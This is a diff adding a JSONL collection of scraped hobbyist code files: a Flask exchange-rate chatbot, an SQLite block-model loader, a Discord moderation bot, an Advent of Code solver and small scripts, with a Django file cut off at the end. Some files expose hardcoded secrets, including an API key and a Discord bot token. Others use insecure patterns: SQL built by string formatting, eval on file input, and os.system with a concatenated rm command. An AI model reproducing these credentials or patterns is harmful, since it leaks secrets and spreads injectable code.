diff --git "a/5005.jsonl" "b/5005.jsonl" new file mode 100644--- /dev/null +++ "b/5005.jsonl" @@ -0,0 +1,1975 @@ +{"seq_id":"71465018705","text":"# n = int(input(\"enter number of rows\"))\nn = 4\ncount = 10\nfor i in range(n+1):\n for j in range(i):\n k = count//2\n print(k,end=\" \")\n k-=1\n\n count-=1\n print()\n ","repo_name":"vivekvinchhi/python-practical-sets","sub_path":"dsa/patterng.py","file_name":"patterng.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71277138067","text":"from psychopy import microphone\nfrom psychopy import event, visual # for key events\n\nmicrophone.switchOn(sampleRate=16000) # do once\n\n# Record for 1.000 seconds, save to mic.savedFile\nmic = microphone.AudioCapture()\nmic.record(1)\nmic.playback()\n\n# Resample, creates a new file discards orig\nmic.resample(48000, keep=False)\n\n# Record new file for 60 sec or until key 'q'\nw = visual.Window() # needed for key-events\nmic.reset()\nmic.record(60, block=False)\nwhile mic.recorder.running:\n if 'q' in event.getKeys():\n mic.stop()","repo_name":"brolim/recovoz","sub_path":"captura/captura_audio.py","file_name":"captura_audio.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3515484089","text":"# imports\n\nimport re\nimport urllib\nimport nltk\nimport unidecode\nimport pytz\nfrom datetime import datetime\n\n\nfrom flask import Flask, render_template, request\nfrom flask_wtf.csrf import CSRFProtect\n\napp = Flask(__name__)\ncsrf = CSRFProtect()\ncsrf.init_app(app)\n\n\n# define app routes\n@app.route(\"/\")\ndef test():\n return render_template(\"home.html\")\n\n\n@app.route(\"/get\")\ndef get_bot_response():\n question = request.args.get('msg')\n answer = get_answer(question)\n return str(answer)\n\n\ndef current_course():\n url = 'https://www.cnb.cz/cs/financni_trhy/devizovy_trh/kurzy_devizoveho_trhu/denni_kurz.txt?date={0:dd\\.MM\\.yyyy}'\n req = urllib.request.Request(url)\n req.add_header('x-api-key', '45TzSCfYbT9SgA28vSO9rdxQHO3YKML6M4Qi045d')\n response = urllib.request.urlopen(req)\n data = str(response.read()).replace(\"\\\\n\", \"\\n\")\n kurz = re.findall(r'EUR{1}[|]{1}[\\d,]*', data)[0].split(\"|\")[1]\n date = re.findall(r'\\d{2}[.]\\d{2}[.]\\d{4}', data)[0]\n return date, kurz\n\n\ndef get_data(day, month, year):\n today = day + \".\" + month + \".\" + year\n url = 'https://www.cnb.cz/cs/financni-trhy/devizovy-trh/kurzy-devizoveho-trhu/kurzy-devizoveho-trhu/vybrane.txt?od=01.01.' + str(\n year) + '&do=' + today + '&mena=EUR&format=txt'\n req = urllib.request.Request(url)\n req.add_header('x-api-key', '45TzSCfYbT9SgA28vSO9rdxQHO3YKML6M4Qi045d')\n response = urllib.request.urlopen(req)\n data = str(response.read()).split(\"\\\\n\")\n del data[0]\n del data[0]\n del data[len(data) - 1]\n return data\n\n\ndef history_course(count_days=14):\n curr_year = datetime.now().strftime('%Y')\n curr_day = datetime.now().strftime('%d')\n curr_month = datetime.now().strftime('%m')\n data = get_data(curr_day, curr_month, curr_year)\n if len(data) < count_days:\n data = get_data(curr_day, curr_month, str(int(curr_year) - 1)) + data\n data = data[-count_days:]\n ret_data = \"Kurz za poslednich \" + str(count_days) + \" dni:
\"\n for day in data:\n ret_data += day.replace(\"|\", \" \") + ' CZE/EUR
'\n return ret_data\n\n\ndef get_recomendation_data():\n data = history_course(4)\n courses = re.findall(r'\\d*,\\d*', data)\n for it, course in enumerate(courses):\n courses[it] = float(course.replace(\",\", \".\"))\n return courses\n\n\ndef course_recommendation(courses):\n recomendation_by_down = True\n for it in range(len(courses[0:3])-1):\n if courses[it] < courses[it+1]:\n recomendation_by_down = False\n break\n mean = (courses[0] + courses[1] + courses[2]) / 3\n recomendation_by_mean = courses[3] < mean + (10 / 100 * mean)\n recomendation = recomendation_by_down or recomendation_by_mean\n return recomendation, recomendation_by_down, recomendation_by_mean, courses[3], round(mean, 3), \\\n round(courses[0] - courses[3], 3), round(courses[3] - mean + (10 / 100 * mean), 3)\n\n\ndef get_answer(question):\n norm_question = unidecode.unidecode(question.lower())\n if nltk.edit_distance(norm_question, \"jaky je cas?\") < 2:\n now = datetime.now(pytz.timezone('CET'))\n return now.strftime(\"%H:%M:%S\")\n elif nltk.edit_distance(norm_question, \"jaky je kurz eura?\") < 2:\n date, course = current_course()\n return \"Aktualni kurz ke dni \" + date + \" je \" + course + \" CZE/EUR\"\n elif nltk.edit_distance(norm_question, \"jak se jmenujes?\") < 2:\n return \"Jmenuji se Chatbot\"\n elif nltk.edit_distance(norm_question, \"jaka je historie kurzu eura?\") < 2:\n return history_course()\n elif nltk.edit_distance(norm_question, \"doporucujes mi euro?\") < 2:\n data = get_recomendation_data()\n recomendation, recomendation_by_down, recomendation_by_mean, today_course, mean, distance, prah_distance = course_recommendation(data)\n odpoved = \"Ano, kurz eura je dnes doporucen.
\" if recomendation else \"Ne, kurz eura neni dnes doporucovan.
\"\n odpoved += \"Dnesni kurz: %.3f CZE/EUR
\" % today_course\n odpoved += \"Prumer za posledni tři dny: %.3f CZE/EUR
\" % mean\n odpoved += \"Kurz vzrostl za posledni tri dny o %.3f
\" % distance if distance > 0 else \"Kurz klesl za posledni tri dny o %f
\" % abs(\n distance)\n\n if recomendation_by_down:\n odpoved += \"Kurz posledni tri dny pouze klesá.
\"\n else:\n odpoved += \"Kurz posledni tri dny je nestabilni.
\"\n\n if recomendation_by_mean:\n odpoved += \"Kurz se nezvysil o více nez 10 procent z prumeru poslednich tri dni
\"\n odpoved += \"Kurz by se nedal doporucit pokud by vzrostl o %.3f na %.3f CZE/EUR
\" % (\n prah_distance, today_course + prah_distance)\n else:\n odpoved += \"Kurz se zvysil o více nez 10 procent z prumeru za posledni tri dny
\"\n odpoved += \"Kurz by se dal doporucit pokud by klesl o %.3f na %.3f
\" % (\n prah_distance, today_course - prah_distance)\n\n return odpoved\n elif nltk.edit_distance(norm_question, \"help?\") < 2:\n return \"Jaký je čas?
Jaký je kurz?
Jak se jmenuješ
Doporucujes mi euro?
jaka je historie kurzu eura?\"\n else:\n return \"nerozumím\"\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"JanPodavka/ChatBotproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24549008416","text":"import os\nimport sqlite3\nimport json\nfrom block import Block\nfrom block_model import BlockModel\nfrom constants import LOADED_MODELS_INFORMATION_FILE_NAME, DB_NAME, MINERAL_GRADES_INFORMATION_FILE_NAME, PRECEDENCE_FILES_PATH\n\n\ndef create_db(db_name=DB_NAME):\n if os.path.isfile(db_name):\n os.remove(db_name)\n sqlite3.connect(db_name)\n\n\ndef get_model_name_from_path(block_model_file_path):\n if \"\\\\\" in block_model_file_path:\n separator = \"\\\\\"\n else:\n separator = \"/\"\n model_name = block_model_file_path.split(separator)[-1].split(\".\")[0]\n return model_name\n\n\ndef retrieve_columns_types(block_model_file_path):\n types = []\n with open(block_model_file_path, \"r\") as blocks:\n first_line = list(blocks)[0].strip().split(\" \")[1:]\n for item in first_line:\n if item.isdigit():\n types.append(\"INT\")\n elif item.replace(\"-\", \"\").isdigit():\n types.append(\"INT\")\n elif item.replace(\".\", \"\").replace(\",\", \"\").replace(\"-\", \"\").isdigit():\n types.append(\"FLOAT\")\n else:\n types.append(\"TEXT\")\n return types\n\n\ndef retrieve_columns_types_from_dict(blocks):\n first_line = list(map(str, list(blocks[0].values())[1:]))\n types = []\n for item in first_line:\n if item.isdigit():\n types.append(\"INT\")\n elif item.replace(\"-\", \"\").isdigit():\n types.append(\"INT\")\n elif item.replace(\".\", \"\").replace(\",\", \"\").replace(\"-\", \"\").isdigit():\n types.append(\"FLOAT\")\n else:\n types.append(\"TEXT\")\n return types\n\n\ndef parse_block_column_types(block):\n parsed_block = []\n block = list(map(str, block))\n for data in block:\n if data.isdigit():\n parsed_block.append(data.strip())\n elif data.replace(\"-\", \"\").isdigit():\n parsed_block.append(data.strip())\n elif data.replace(\".\", \"\").replace(\",\", \"\").replace(\"-\", \"\").isdigit():\n parsed_block.append(data.strip())\n else:\n parsed_block.append(\"\\'{}\\'\".format(data.strip()))\n return parsed_block\n\n\ndef create_table_query(model_name, table_columns, columns_types):\n db_columns = [\"{} INT PRIMARY KEY \".format(table_columns[0])]\n for column_name, column_type in zip(table_columns[1:], columns_types):\n db_columns.append(\"{} {} NOT NULL\".format(column_name, column_type))\n query = \"CREATE TABLE IF NOT EXISTS {}({});\".format(model_name, \",\".join(db_columns))\n return query\n\n\ndef load_block_file(block_model_file_path, table_columns, mineral_grades_info, db_name=DB_NAME,\n models_json=LOADED_MODELS_INFORMATION_FILE_NAME, minerals_json=MINERAL_GRADES_INFORMATION_FILE_NAME):\n try:\n model_name = get_model_name_from_path(block_model_file_path)\n conn = sqlite3.connect(db_name)\n columns_types = retrieve_columns_types(block_model_file_path)\n conn.execute(create_table_query(model_name, table_columns, columns_types))\n conn.commit()\n with open(block_model_file_path, \"r\") as block_file:\n columns_for_query = \",\".join(table_columns)\n for block in block_file:\n block_parsed = \",\".join(parse_block_column_types(block.strip().split(\" \")))\n insert_query = \"INSERT INTO {}({}) VALUES ({})\".format(model_name, columns_for_query, block_parsed)\n conn.execute(insert_query)\n conn.commit()\n 
dump_model_information_into_json(model_name, table_columns, models_json)\n dump_model_information_into_json(model_name, mineral_grades_info, minerals_json)\n return True\n except sqlite3.IntegrityError:\n return False\n\n\ndef load_block_json(model_name, table_columns, minerals, blocks, db_name=DB_NAME,\n models_json=LOADED_MODELS_INFORMATION_FILE_NAME, minerals_json=MINERAL_GRADES_INFORMATION_FILE_NAME):\n try:\n conn = sqlite3.connect(db_name)\n columns_types = retrieve_columns_types_from_dict(blocks)\n conn.execute(create_table_query(model_name, table_columns, columns_types))\n conn.commit()\n columns_for_query = \",\".join(table_columns)\n for block in blocks:\n block = list(block.values())\n block_parsed = \",\".join(parse_block_column_types(block))\n insert_query = \"INSERT INTO {}({}) VALUES ({})\".format(model_name, columns_for_query, block_parsed)\n conn.execute(insert_query)\n conn.commit()\n dump_model_information_into_json(model_name, table_columns, models_json)\n dump_model_information_into_json(model_name, minerals, minerals_json)\n return True\n except sqlite3.IntegrityError:\n return False\n\n\ndef dump_model_information_into_json(model_name, column_names, json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n with open(json_file_name, 'r') as json_file:\n data = json.load(json_file)\n data[model_name] = column_names\n with open(json_file_name, 'w') as json_file:\n json.dump(data, json_file, sort_keys=True)\n\ndef get_models_information_json(json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n with open(json_file_name) as json_file:\n model_information_json = json.load(json_file)\n return model_information_json\n\n\ndef get_mineral_grades_information_json(json_file_name=MINERAL_GRADES_INFORMATION_FILE_NAME):\n with open(json_file_name) as json_file:\n mineral_grades_information_json = json.load(json_file)\n return mineral_grades_information_json\n\ndef get_model_columns_names(model_name, json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n models_information = get_models_information_json(json_file_name)\n return models_information[model_name]\n\ndef get_available_models(json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n models = get_models_information_json(json_file_name)\n models_names = models.keys()\n return list(models_names)\n\n\ndef check_if_model_exists_in_json(block_model_name, json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME):\n model_information_json = get_models_information_json(json_file_name)\n if block_model_name in model_information_json.keys():\n return True\n else:\n return False\n\n\ndef get_block_model_object(block_model_name, json_file_name=LOADED_MODELS_INFORMATION_FILE_NAME, db_name=DB_NAME, json_mineral_grades_file_name=MINERAL_GRADES_INFORMATION_FILE_NAME):\n if check_if_model_exists_in_json(block_model_name, json_file_name):\n columns = get_models_information_json(json_file_name)[block_model_name]\n columns_query_format = \",\".join(columns)\n conn = sqlite3.connect(db_name)\n cursor = conn.execute(\"SELECT {} FROM {}\".format(columns_query_format, block_model_name))\n blocks = []\n for row in cursor.fetchall():\n blocks.append(Block({attribute: value for (attribute, value) in zip(columns, row)}))\n minerals = get_mineral_grades_information_json(json_mineral_grades_file_name)[block_model_name]\n precedence = load_model_precedence(block_model_name)\n return BlockModel(block_model_name, blocks, columns, minerals, precedence)\n\n\ndef get_column_types_from_block(block_model):\n types = []\n block = block_model.blocks[0]\n for column in 
block_model.columns:\n if type(block.attributes[column]) == int:\n types.append(\"INT\")\n elif type(block.attributes[column]) == float:\n types.append(\"FLOAT\")\n elif type(block.attributes[column]) == str:\n types.append(\"TEXT\")\n return types\n\n\ndef load_block_model_object(block_model, db_name=DB_NAME, models_json=LOADED_MODELS_INFORMATION_FILE_NAME,\n minerals_json=MINERAL_GRADES_INFORMATION_FILE_NAME):\n columns_types = get_column_types_from_block(block_model)\n\n try:\n conn = sqlite3.connect(db_name)\n conn.execute(create_table_query(block_model.name, block_model.columns, columns_types))\n conn.commit()\n for block in block_model.blocks:\n block_parsed = \",\".join(parse_block_column_types(list(map(str, [block.attributes[column]\n for column in block_model.columns]))))\n columns_for_query = \",\".join(block_model.columns)\n model_name = block_model.name\n insert_query = \"INSERT INTO {}({}) VALUES ({})\".format(model_name, columns_for_query, block_parsed)\n conn.execute(insert_query)\n conn.commit()\n dump_model_information_into_json(model_name, block_model.columns, models_json)\n dump_model_information_into_json(model_name, block_model.minerals, minerals_json)\n return True\n except:\n return False\n\n\ndef load_model_precedence(block_model_name, precedence_path=PRECEDENCE_FILES_PATH):\n filenames = os.listdir(os.path.join(os.getcwd(), precedence_path))\n precedence = {}\n block_model_precedence_file = \"{}.prec\".format(block_model_name)\n for filename in filenames:\n if block_model_precedence_file in filename:\n file = open(os.path.join(os.getcwd(), precedence_path, filename))\n for line in file:\n data = line.strip().split(\" \")\n if data[1] != \"0\":\n precedence[data[0]] = data[2:]\n else:\n precedence[data[0]] = []\n return precedence\n\n\n\n","repo_name":"Vicentecorrea/group_1_2020","sub_path":"load_block_model.py","file_name":"load_block_model.py","file_ext":"py","file_size_in_byte":9414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34227300228","text":"from collections import defaultdict\nfrom enum import IntEnum\nfrom functools import cached_property\nfrom itertools import chain\nfrom typing import DefaultDict, Iterable, Self\n\nCoordinate = tuple[int, int]\n\n\ndef parse_input(path=\"input.txt\") -> list[\"Path\"]:\n paths = []\n with open(path, \"r\") as fp:\n line = fp.readline()\n while line:\n paths.append(\n Path([eval(\"(\" + chars + \")\") for chars in line.split(\" -> \")])\n )\n line = fp.readline()\n\n return paths\n\n\nclass Path:\n def __init__(self, edges: Iterable[Coordinate]):\n self.edges = tuple(edges)\n\n def __repr__(self) -> None:\n return f\"Path({self.edges})\"\n\n @property\n def is_valid(self) -> bool:\n \"\"\"A path is valid iff all its edges have a common row or column connecting them.\"\"\"\n if any(\n start[0] != end[0] and start[1] != end[1]\n for start, end in zip(self.edges[:-1], self.edges[1:])\n ):\n return False\n\n return True\n\n @cached_property\n def coordinates(self) -> Iterable[Coordinate]:\n \"\"\"All the coordinates connecting the edges of the path.\"\"\"\n\n assert self.is_valid\n\n def expand(start: Coordinate, end: Coordinate) -> list[Coordinate]:\n \"\"\"Expands a pair of coordinates into a list of coordinates covering every\n possible coordinate between and including the pair.\n\n \"\"\"\n if start[0] != end[0]:\n return [\n (i, start[1])\n for i in range(min(start[0], end[0]), max(start[0], end[0]) + 1)\n ]\n else:\n return [\n (start[0], i)\n for i in 
range(min(start[1], end[1]), max(start[1], end[1]) + 1)\n ]\n\n return set(\n chain.from_iterable(\n expand(start, end)\n for start, end in zip(self.edges[:-1], self.edges[1:])\n )\n )\n\n\nclass Entity(IntEnum):\n air = 0\n rock = 1\n sand = 2\n source = 3\n\n\nclass CaveOutOfBoundsError(Exception):\n pass\n\n\nclass CaveCannotAddSandError(Exception):\n pass\n\n\nclass Cave:\n def __init__(\n self,\n source: Coordinate = (500, 0),\n rock_paths: Iterable[Path] = (),\n sand_coordinates: Iterable[Coordinate] = (),\n has_floor: bool = False,\n padding: int = 1,\n ):\n self.source_coordinate = source\n self.sand_coordinates = tuple(sand_coordinates)\n self.rock_paths = tuple(rock_paths)\n self.has_floor = has_floor\n self.padding = padding\n\n def __repr__(self) -> str:\n return (\n \"Cave(\"\n + \",\".join(\n (\n f\"source={self.source_coordinate},\",\n f\"rock_paths={self.rock_paths},\",\n f\"sand_coordinates={self.sand_coordinates},\",\n f\"has_floor={self.has_floor}\",\n f\"padding={self.padding},\",\n )\n )\n + \")\"\n )\n\n def __str__(self) -> None:\n # construct an array of cave entities\n source_x, source_y = self.source_coordinate\n min_x, max_x = self.x_range\n min_y, max_y = self.y_range\n\n ncol = max_x - min_x + 1\n nrow = max_y - min_y + 1\n\n array = [[Entity.air for _ in range(ncol)] for _ in range(nrow)]\n array[source_y - min_y][source_x - min_x] = Entity.source\n for x, y in self.rock_coordinates:\n array[y - min_y][x - min_x] = Entity.rock\n\n for x, y in self.sand_coordinates:\n array[y - min_y][x - min_x] = Entity.sand\n\n # add floor?\n if self.has_floor:\n if max_y == max(\n y for x, y in self.rock_coordinates\n ): # nothing below lowest rock\n array.append([Entity.air for _ in range(ncol)])\n\n array.append([Entity.rock for _ in range(ncol)])\n\n # apply padding to it\n col_pad = [Entity.air for _ in range(self.padding)]\n row_pad = [\n col_pad + [Entity.air for _ in range(ncol)] + col_pad\n for _ in range(self.padding)\n ]\n array = row_pad + [col_pad + list(row) + col_pad for row in array] + row_pad\n\n # convert it to a /graphic/ string\n chars = {\n Entity.air: \".\",\n Entity.rock: \"#\",\n Entity.sand: \"o\",\n Entity.source: \"+\",\n }\n\n return \"\\n\".join(\"\".join(chars[item] for item in row) for row in array)\n\n def __contains__(self, coordinate: Coordinate) -> bool:\n \"\"\"A cave contains a pair of coordinates if they do not designate a position\n above its roof nor below its floor.\n\n \"\"\"\n x, y = coordinate\n min_x, max_x = self.x_range\n min_y, max_y = self.y_range\n if not self.has_floor:\n return min_y <= y\n else:\n return min_y <= y <= self.floor_level\n\n def __getitem__(self, coordinate: Coordinate) -> Entity:\n x, y = coordinate\n if (x, y) not in self:\n raise CaveOutOfBoundsError()\n\n if y == self.floor_level:\n return Entity.rock\n\n return self.grid[x, y]\n\n @cached_property\n def rock_coordinates(self) -> tuple[Coordinate]:\n return tuple(chain.from_iterable(path.coordinates for path in self.rock_paths))\n\n @cached_property\n def x_range(self) -> Coordinate:\n \"\"\"The horisontal range of coordinates in which there is something besides air.\"\"\"\n crds = (\n list(self.rock_coordinates)\n + [self.source_coordinate]\n + list(self.sand_coordinates)\n )\n return min(x for x, y in crds), max(x for x, y in crds)\n\n @cached_property\n def y_range(self) -> Coordinate:\n \"\"\"The vertical range of coordinates in which there is something besides air.\"\"\"\n crds = (\n list(self.rock_coordinates)\n + [self.source_coordinate]\n + 
list(self.sand_coordinates)\n )\n return min(y for x, y in crds), max(y for x, y in crds)\n\n @cached_property\n def floor_level(self) -> int | None:\n if not self.has_floor:\n return None\n\n return max(y for x, y in self.rock_coordinates) + 2\n\n @cached_property\n def grid(self) -> DefaultDict[Coordinate, Entity]:\n grid = defaultdict(lambda: Entity.air)\n grid[self.source_coordinate] = Entity.source\n for x, y in self.rock_coordinates:\n grid[x, y] = Entity.rock\n\n for x, y in self.sand_coordinates:\n grid[x, y] = Entity.sand\n\n return grid\n\n @cached_property\n def nrock(self) -> int:\n return len(self.rock_coordinates)\n\n @cached_property\n def nsand(self) -> int:\n return len(self.sand_coordinates)\n\n def simulate(self) -> Coordinate | None:\n \"\"\"Simulate a grain of sand falling from the source, return\n the coordinates it will land on.\n\n If the cave has no floor and the grain will continue to fall forever, return\n None.\n\n If it does have a floor, this method will always return a coordinate. Eventually\n returning the coordinate of the source once the cave is filled with sand.\n\n \"\"\"\n _, max_y = self.y_range\n\n def step(x, y) -> Coordinate | None:\n # fallen off?\n if not self.has_floor and max_y < y:\n return None\n\n # down one step\n if self[x, y + 1] == Entity.air:\n return step(x, y + 1)\n\n # down and to the left\n if self[x - 1, y + 1] == Entity.air:\n return step(x - 1, y + 1)\n\n # down and to the right\n if self[x + 1, y + 1] == Entity.air:\n return step(x + 1, y + 1)\n\n return x, y\n\n return step(*self.source_coordinate)\n\n def add_sand(self, x: int, y: int) -> Self:\n \"\"\"Create a new cave with a sand added to the designated position.\"\"\"\n if (x, y) not in self:\n raise CaveOutOfBoundsError()\n\n if self[x, y] in (Entity.rock, Entity.sand):\n raise CaveCannotAddSandError(\n f\"cannot add sand to a position already occupied by a {self[x, y].name}\"\n )\n\n return Cave(\n self.source_coordinate,\n self.rock_paths,\n list(self.sand_coordinates) + [(x, y)],\n self.has_floor,\n self.padding,\n )\n\n def add_floor(self) -> Self:\n return Cave(\n self.source_coordinate,\n self.rock_paths,\n self.sand_coordinates,\n True,\n self.padding,\n )\n\n\nif __name__ == \"__main__\":\n # Part 1\n cave = Cave(rock_paths=parse_input())\n crd = cave.simulate()\n while crd is not None:\n cave = cave.add_sand(*crd)\n crd = cave.simulate()\n\n print(cave)\n print(f\"Grains of sand in floor less cave: {cave.nsand}\")\n\n # Part 2\n cave = cave.add_floor()\n crd = cave.simulate()\n while crd != cave.source_coordinate:\n cave = cave.add_sand(*crd)\n crd = cave.simulate()\n\n cave = cave.add_sand(*cave.source_coordinate)\n print(cave)\n print(f\"Grains of sand in floored cave: {cave.nsand}\")\n","repo_name":"jslofsgaard/AoC","sub_path":"2022/14/regolith_reservoir.py","file_name":"regolith_reservoir.py","file_ext":"py","file_size_in_byte":9316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4387708586","text":"import speech_recognition as sr\r\ndef write_file(text):\r\n f= open('./note.txt','a')\r\n f.write(text)\r\n f.close()\r\nr=sr.Recognizer()\r\nwith sr.Microphone() as source:\r\n print(\"Listening\")\r\n while 1:\r\n audio=r.listen(source)\r\n try:\r\n text=r.recognize_google(audio)\r\n if (text=='class over'):\r\n print('done')\r\n break \r\n print(text)\r\n write_file(\" \"+text)\r\n except:\r\n print('Sorry could not reconize your voice')\r\nprint('notes stored in notes 
file')","repo_name":"yogeeswar2001/smartNoteMaker","sub_path":"speech_text.py","file_name":"speech_text.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26867661916","text":"''' File lock mechanism for Cache\n'''\n\n# Standard imports\nimport os, errno, time\n\n# Logger\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Wait until multithread process could acquire lock\ndef waitForLock(filename):\n lockAcquired = False\n while not lockAcquired:\n try:\n f = os.open(filename + \"_lock\", os.O_CREAT | os.O_EXCL | os.O_WRONLY)\n os.close(f)\n lockAcquired = True\n except OSError as e:\n if e.errno == errno.EEXIST: # Failed as the file already exists.\n time.sleep(1)\n else: # Something unexpected went wrong\n logger.error( \"Problem acquiring the lock\" )\n exit(1)\n\ndef removeLock(filename):\n os.system(\"rm \" + filename + \"_lock\")\n","repo_name":"HephyAnalysisSW/TopEFT","sub_path":"Tools/python/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43521441306","text":"import os\r\nimport discord\r\nimport datetime\r\nimport asyncio\r\nimport pyjokes\r\nfrom better_profanity import profanity\r\n\r\n\r\n\r\nmessages = joined = 0\r\nchecker=0\r\n\r\njoke = pyjokes.get_joke(\"en\", \"all\")\r\nclient = discord.Client()\r\ntoken = \"OTQ2NDI5NDY4NzkxMTczMTgx.YhelIQ.Ardht6ytzVQpdNlx6osVtknfaOQ\"\r\n\r\n\r\ndef bad_sink(message):\r\n global checker\r\n censored = profanity.censor(message)\r\n if message==censored :\r\n checker=0\r\n else :\r\n checker=1\r\n\r\n\r\ndef ran_joke():\r\n joke = pyjokes.get_joke(\"en\", \"all\")\r\n return joke\r\n\r\n\r\n\r\nasync def update_stats():\r\n await client.wait_until_ready()\r\n global messages, joined\r\n\r\n while not client.is_closed():\r\n try:\r\n with open(\"stats.txt\", \"a\") as f:\r\n f.write(\r\n f\"TIME : {datetime.datetime.now()}, MESSAGES : {messages} ,MEMBERS : {joined}\\n\"\r\n )\r\n\r\n messages = 0\r\n joined = 0\r\n\r\n await asyncio.sleep(600)\r\n\r\n except Exception as e:\r\n print(e)\r\n await asyncio.sleep(600)\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n with open(\"stats.txt\", \"a\") as f:\r\n f.write(\r\n f\"We have logged in as {client.user} on {datetime.datetime.now()} \\n\"\r\n )\r\n print(\"BOT IS ONLINE...\")\r\n\r\n\r\n@client.event\r\nasync def on_member_update(before, after):\r\n n = after.nick\r\n if n:\r\n if n.lower().count(\"navodaya\") > 0:\r\n last = before.nick\r\n if last:\r\n await after.edit(nick=last)\r\n else:\r\n await after.edit(nick=\"change ur nick\")\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n\r\n global joined\r\n joined += 1\r\n\r\n for channel in member.guild.channels:\r\n if str(channel) == \"general\":\r\n await client.send_message(f\"Welcome to the server {member.mention}\")\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n\r\n global messages\r\n messages += 1\r\n id = client.get_guild(946424314423558164)\r\n channels1 = [\"testing\"]\r\n commands = [\"!joke\", \"$help\", \"!details\",\"!coin\",\"!users\",\"$commands\"]\r\n greetings = [\"hi\", \"HI\", \"Hi\", \"HII\", \"Hii\", \"hii\", \"GM\", \"Good\",\"good\", \"Good morning\",\"Hello\"]\r\n admin_commands = [\"!delete all\",\"!delete 20\"]\r\n valid_users = [\"Navodaya#5068\"]\r\n \r\n\r\n\r\n\r\n\r\n\r\n bad_sink(message.content)\r\n if checker==0 :\r\n pass\r\n 
else :\r\n print (f\"The message was deleted(bad word) {message.content} from {message.author}\")\r\n await message.channel.purge(limit =1)\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n #if str(message.channel) in channels1 and str(message.content) in commands:\r\n if str(message.content) in commands:\r\n\r\n if str(message.content) == \"!users\":\r\n await message.channel.send(f\"TOTAL NO OF USERS : {id.member_count}\")\r\n \r\n elif str(message.content) == \"!joke\":\r\n await message.channel.send(ran_joke())\r\n\r\n elif str(message.content) == \"!coin\":\r\n await message.channel.send('Hello.'or 'helo')\r\n\r\n elif str(message.content) == \"!details\" :\r\n await message.channel.send(\"HELLO! IM FOREVER BOT 1.O,AS MY NAME SAYS I USED TO RUN FOREVER AND I WAS CREATED ON 22.02.2022\")\r\n\r\n elif message.content == \"$help\":\r\n embed = discord.Embed(title=\"HEY HOW CAN I HELP YOU?\",description=\"I CAN HELP BY THESE COMMANDS\")\r\n \r\n embed.add_field(name=\"!users\", value=\"GIVES TOTAL OF USERS\")\r\n embed.add_field(name=\"!joke\", value=\"GIVES A JOKE\")\r\n embed.add_field(name=\"!commands\", value=\"GIVES LIST OF COMMANDS\") \r\n embed.add_field(name=\"!details\", value=\"BASIC INFO ABOUT ME\")\r\n \r\n await message.channel.send(content=None, embed=embed)\r\n\r\n elif message.content == \"$commands\":\r\n embed = discord.Embed(title=\"Commands you can use\",description=\"If you are unable to perform any Commands check your Permissions\")\r\n \r\n embed.add_field(name=\"!users\", value=\"GIVES TOTAL OF USERS\")\r\n embed.add_field(name=\"!joke\", value=\"GIVES A JOKE\")\r\n embed.add_field(name=\"!delete all\", value=\"Delete all message range of 100 [ADMINS]\")\r\n embed.add_field(name=\"!delete 20\", value=\"Delete 20 messages [ADMINS]\")\r\n embed.add_field(name=\"!details\", value=\"BASIC INFO ABOUT ME\")\r\n \r\n await message.channel.send(content=None, embed=embed)\r\n\r\n \r\n content = message.content.lower()\r\n\r\n if message.author == client.user:\r\n return\r\n\r\n if any(greeting in content for greeting in greetings):\r\n return await message.channel.send('Hello,Good to see you :-)')\r\n\r\n if str(message.author) in valid_users:\r\n \r\n if str(message.content) in admin_commands and str(message.content) == \"!delete all\":\r\n \r\n with open(\"history.txt\", \"a\") as f:\r\n f.write(f\"All message was deleted by {message.author} on {datetime.datetime.now()} \\n\") \r\n await message.channel.purge(limit=100)\r\n\r\n elif str(message.content) in admin_commands and str(message.content) == \"!delete 20\":\r\n \r\n with open(\"history.txt\", \"a\") as f:\r\n f.write(f\"20 message was deleted by {message.author} on {datetime.datetime.now()} \\n\") \r\n await message.channel.purge(limit=20)\r\n\r\n \r\n\r\n\r\nclient.loop.create_task(update_stats())\r\nclient.run(token)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Navodayavarmak/PRO-BOT","sub_path":"ART.PY","file_name":"ART.PY","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"73666575184","text":"from django.shortcuts import render , render_to_response\nfrom django.http import HttpResponse\nimport requests\nfrom . 
